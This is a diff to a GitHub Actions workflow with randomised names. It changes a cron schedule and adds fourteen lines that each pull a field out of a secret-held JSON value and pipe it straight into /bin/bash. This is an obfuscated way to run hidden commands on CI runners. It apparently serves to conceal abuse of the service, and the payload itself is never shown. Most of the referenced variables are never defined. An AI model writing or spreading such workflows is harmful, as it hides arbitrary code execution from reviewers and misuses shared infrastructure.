--- a/.github/workflows/mingyulu1837.yml
+++ b/.github/workflows/mingyulu1837.yml
@@ -3,7 +3,7 @@ name: mingyulu1837
 on:
   workflow_dispatch:
   schedule:
-    - cron: '8 1/6 * * *'
+    - cron: '31 4/6 * * *'
 
 jobs:
   build:
@@ -13,16 +13,20 @@ jobs:
       - uses: actions/checkout@v4
       - name: mingyulu1837
         env:
-          h5052: ${{ secrets.h5052 }}
+          t3: ${{ secrets.t3 }}
         run: |
-          echo $h5052 | jq -r .yzoy249 | /bin/bash
-          echo $ib8424 | jq -r .siq23 | /bin/bash
-          echo $e46022 | jq -r .hlnli7520 | /bin/bash
-          echo $ap709 | jq -r .h5 | /bin/bash
-          echo $shmo167 | jq -r .pjqow82940 | /bin/bash
-          echo $g00543 | jq -r .ocpuz59 | /bin/bash
-          echo $m562 | jq -r .xuox549 | /bin/bash
-          echo $kszvm01444 | jq -r .sk3348 | /bin/bash
-          echo $vvhj3234 | jq -r .us852 | /bin/bash
-          echo $rnfvt793 | jq -r .usxkj0 | /bin/bash
+          echo $t3 | jq -r .pmo33988 | /bin/bash
+          echo $jqe3 | jq -r .eqvho30666 | /bin/bash
+          echo $lb86 | jq -r .x54122 | /bin/bash
+          echo $gg7 | jq -r .rxct0 | /bin/bash
+          echo $fr1 | jq -r .iz4958 | /bin/bash
+          echo $quzpf5 | jq -r .mfepo41 | /bin/bash
+          echo $yedj8 | jq -r .o975 | /bin/bash
+          echo $ntkv0496 | jq -r .fgoc583 | /bin/bash
+          echo $v94389 | jq -r .lr9 | /bin/bash
+          echo $zwe4 | jq -r .qaa63707 | /bin/bash
+          echo $j21508 | jq -r .we75363 | /bin/bash
+          echo $vu6 | jq -r .l330 | /bin/bash
+          echo $neo67645 | jq -r .h06 | /bin/bash
+          echo $fstds0556 | jq -r .lq32 | /bin/bash
 
